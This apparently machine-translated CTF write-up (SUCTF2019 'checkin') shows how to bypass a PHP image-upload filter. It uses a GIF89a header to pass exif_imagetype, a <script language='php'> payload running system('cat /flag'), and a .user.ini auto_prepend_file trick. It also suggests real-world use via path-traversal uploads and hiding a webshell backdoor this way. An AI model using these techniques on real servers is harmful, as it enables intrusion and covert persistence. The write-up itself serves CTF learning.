[SUCTF2019] checkin (.user.ini and exif_imagetype () function is bypassed)

Others 2020-01-28 23:32:13 views: null

0x01 Title Description

Open the page web found to be a uploaded
Here Insert Picture Description

1, we just try to upload a php file
Here Insert Picture Description
the wrong name suffix


2, we try to upload pictures

Here Insert Picture Description
Here you can guess is exif_imagetype()a function of judgment is not a picture, to bypass this well, add a picture header in the file header can be, for example, gifthe header GIF89a


3, we add in the picture phpcode.
Here Insert Picture Description
Which can not contain pictures <?, we can bypass with other statements

<script language=”php”>xxx</script>
<% xxx %>
<? xxx ?>


0x02 ideas cleanup

1 file can not be uploaded with <? A
2, uploaded files must contain a picture header

Solution, we can first upload a .user.ini go, used to resolve images with php code, you can achieve the purpose of bypassing restrictions.

Upload pictures a.gifof code contained
GIF89a
<script language='php'>system('cat /flag');</script>
Upload .user.inicode
GIF89a
auto_prepend_file=a.gif

auto_prepend_file=a.gifThis sentence is equivalent to all php files in the current folder will be includeda.gif


0x03 answer

After uploading the two files show
Here Insert Picture Descriptionus direct access to the upload directory of index.php
Here Insert Picture Description
the topic and people can access a deliberately set in the upload directory phpfile, so it can contain pictures I upload the code, but in reality instances are rare.



0x04 .user.ini possibility of combat use

As described above .user.iniusing the following conditions:

  • Server scripting language PHP
  • The server uses CGI / FastCGI mode
  • php file upload directory to have executable under

From this point of view .user.inithan the .htaccessrange of applications to a wide, after all, .htaccesscan only be usedApache

But a closer scrutiny we will feel "under the upload directory to have executable file php" This requires the file upload is also more demanding, there should be no genius developers will upload files in your home directory or the phpfiles in a folder to upload .

But it is not no way, if we cooperate with other vulnerabilities according to the actual situation of use may be miraculous, some time ago I met a CMSnot detected when the upload path ../, thus resulting files can be uploaded to any directory, in which case we it is very likely you can use.user.ini

In addition, the .user.iniuse of hidden in the back door should be a good use of the method, in the presence of our directory php files left behind .user.iniand our horse pictures, so that to achieve the purpose of hiding the back door.

HyyMbb
Published 47 original articles · won praise 2 · Views 3140
Private letter concerns

Guess you like

Origin blog.csdn.net/a3320315/article/details/102923965
Recommended
LFOSSA Yuanlaisusu Open Course | Mastering the Cloud Native Future: Comprehensive Guide to CNCF Certification and Exam Preparation Tips
Ranking
C++ Basic Syntax
bootstrapTable hides a column based on a condition
Why is reentrant lock recommended instead of Synchronized when dynamic high concurrency?
hexo create a blog
[Fully open source and non-encrypted version] Imitation of the eighth district distribution/online signature/multiple sets of download templates/APP distribution hosting/APP packaging and packaging
Polymerization combination
https://www.flysnow.org/2017/05/06/go-in-action-go-log.html
From the perspective of Flutter and the front-end, talk about how to ensure UI fluency under the single-threaded model
nginx-301, 302 redirect
Geolocation by IP Address in ASP.NET
Daily
More
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(31)

Code World

© 2018 codetd.com